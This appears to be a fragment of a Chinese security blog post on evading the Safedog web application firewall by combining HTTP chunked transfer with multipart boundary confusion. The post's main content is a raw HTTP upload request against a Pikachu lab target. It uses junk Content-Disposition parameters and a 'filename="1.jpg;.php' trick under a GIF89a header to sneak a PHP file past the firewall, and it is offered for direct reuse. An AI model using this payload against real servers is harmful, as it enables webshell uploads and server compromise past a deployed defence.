http分块传输⼀直是⼀个很经典的绕过⽅式,只是在近⼏年分块传输⼀直被卡的很死,很多waf都开始加
⼊了检测功能,所以的话,分块传输这⾥也不是很好使,但是配合边界混淆,好使的⼀批。
开源绕过1
在百度上有很多开源的⽅式来绕过安全狗,但是⼀⼀测试发现,绕过效果⾮常之垃圾,⼏乎都遇到了狗的阻拦,所以这⾥就经过变种+fuzz,来实现绕过安全狗,直接贴代码。
- POST /pikachu-master/vul/unsafeupload/clientcheck.php HTTP/1.1
- Host: 192.168.172.161
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- Accept-Encoding: gzip, deflate
- Content-Type: multipart/form-data; boundary=---------------------------378605579232816195651620102739
- Content-Length: 448
- Origin: http://192.168.172.161
- Connection: close
- Referer: http://192.168.172.161/pikachu-master/vul/unsafeupload/clientcheck.php
- Cookie: PHPSESSID=sop5homauph2bdfeidn6ttv8l1
- Upgrade-Insecure-Requests: 1
-
- -----------------------------378605579232816195651620102739
- Content-Disposition: form-data; name="uploadfile";fagfhaiofnalkvjoaffufile name=fjalfmavlaa; filename="1.jpg;.php
- Content-Type: image/jpeg
- GIF89a
- ]\'
- d]\['
- /\'
- \]']\'
- /\]'
- w
- -----------------------------378605579232816195651620102739
- Content-Disposition: form-data; name="submit"
- 开始上传
- -----------------------------378605579232816195651620102739--